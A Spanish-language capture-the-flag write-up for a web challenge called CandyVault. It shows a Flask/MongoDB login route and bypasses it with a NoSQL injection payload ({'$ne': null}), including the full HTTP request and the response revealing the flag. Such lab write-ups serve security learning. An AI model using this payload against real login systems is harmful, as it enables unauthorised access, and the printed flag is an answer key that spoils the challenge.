CandyVault
Challenge Description
The malevolent spirits have concealed all the Halloween treats within their secret vault, and it’s imperative that you decipher its enigmatic seal to reclaim the candy before the spooky night arrives.
Categoria: Web
Dificultad: Muy Fácil
Solution
Analizando el codigo de la aplicacion vemos la funcion login que es la mas relevante.
challenge/application/app.py
@app.route("/login", methods=["POST"])
def login():
content_type = request.headers.get("Content-Type")
if content_type == "application/x-www-form-urlencoded":
email = request.form.get("email")
password = request.form.get("password")
elif content_type == "application/json":
data = request.get_json()
email = data.get("email")
password = data.get("password")
else:
return jsonify({"error": "Unsupported Content-Type"}), 400
user = users_collection.find_one({"email": email, "password": password})
if user:
return render_template("candy.html", flag=open("flag.txt").read())
else:
return redirect("/")
Esta funcion recibe 2 argumentos email y password. Tambien sabemos que la aplicacion esta utilizando MongoDB esto nos hace pensar que podemos hacer bypass del login con el siguiente payload.
{"email": {"$ne": null}, "password": {"$ne": null}}
Una vez que enviamos el paylod nos regresara la bandera.
POST /login HTTP/1.1
Host: 94.237.55.96:35207
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 51
Origin: http://94.237.55.96:35207
Connection: keep-alive
Referer: http://94.237.55.96:35207/
Upgrade-Insecure-Requests: 1
Priority: u=0, i
{"email": {"$ne": null}, "password": {"$ne": null}}
</style>
</head>
<body>
<p data-text="HTB{s4y_h1_t0_th3_c4andy_v4u1t!}">HTB{s4y_h1_t0_th3_c4andy_v4u1t!}</p>
</body>
</html>
References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection